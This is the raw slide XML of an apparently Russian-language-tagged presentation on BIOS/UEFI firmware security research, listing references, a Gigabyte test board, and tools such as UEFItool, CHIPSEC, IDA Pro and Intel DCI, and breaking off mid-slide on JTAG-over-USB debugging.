          <a:xfrm>
            <a:off x="5735638" y="1642300"/>
            <a:ext cx="5253351" cy="429008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374" name="Shape 374"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Shape 375"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623879" y="1559880"/>
            <a:ext cx="10946449" cy="2497680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-184400" lvl="1" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Advanced x86: Introduction to BIOS &amp; SMM (John Butterworth)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184400" lvl="1" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Training: Security of BIOS/UEFI System Firmware from Attacker and Defender Perspectives (Advanced Threat Research, McAfee/Intel)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184400" lvl="1" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Attacking and Defending BIOS in 2015 (Advanced Threat Research, McAfee/Intel</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>UEFI Firmware Rootkits: Myths and Reality (Alex Matrosov and Eugene Rodionov)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Shape 376"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Useful references</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Shape 377"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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382" name="Shape 382"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Shape 383"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605160" y="3079080"/>
            <a:ext cx="11501640" cy="718200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="90000" rIns="90000" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-2300" lvl="0" marL="396000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Preliminary stage of the research</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Shape 384"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="2912760"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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389" name="Shape 389"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Shape 390"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Making the showcase stand</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="Shape 391"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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392" name="Shape 392"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5939076" y="1628775"/>
            <a:ext cx="5521449" cy="3112786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Shape 393"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641985" y="1442185"/>
            <a:ext cx="5297087" cy="3795891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Gigabyte GA-Q170M-D3H:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Latest F22 BIOS version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Gigabyte has least amount of BIOS protections turned on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>BIOS itself is based on AMI Aptio V which is very popular</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Intel DCI supported</a:t>
            </a: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398" name="Shape 398"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Shape 399"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623888" y="1559880"/>
            <a:ext cx="9682192" cy="2497680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="55000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Original toolset is as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184400" lvl="0" marL="540000" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>UEFItool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184400" lvl="0" marL="540000" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>CHIPSEC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184400" lvl="0" marL="540000" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>IDA Pro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184400" lvl="0" marL="540000" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Intel DCI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Shape 400"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Tools for the research</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Shape 401"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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402" name="Shape 402"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4935975" y="1559875"/>
            <a:ext cx="6699150" cy="45361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407" name="Shape 407"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Shape 408"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605160" y="3079080"/>
            <a:ext cx="11501640" cy="718200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="90000" rIns="90000" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-2300" lvl="0" marL="396000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Intel Direct Connect Technology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Shape 409"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="2912760"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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414" name="Shape 414"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="Shape 415"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651050" y="1559875"/>
            <a:ext cx="9682200" cy="441630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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Allows low-level processor debugging: JTAG over USB 3.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="55000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000">
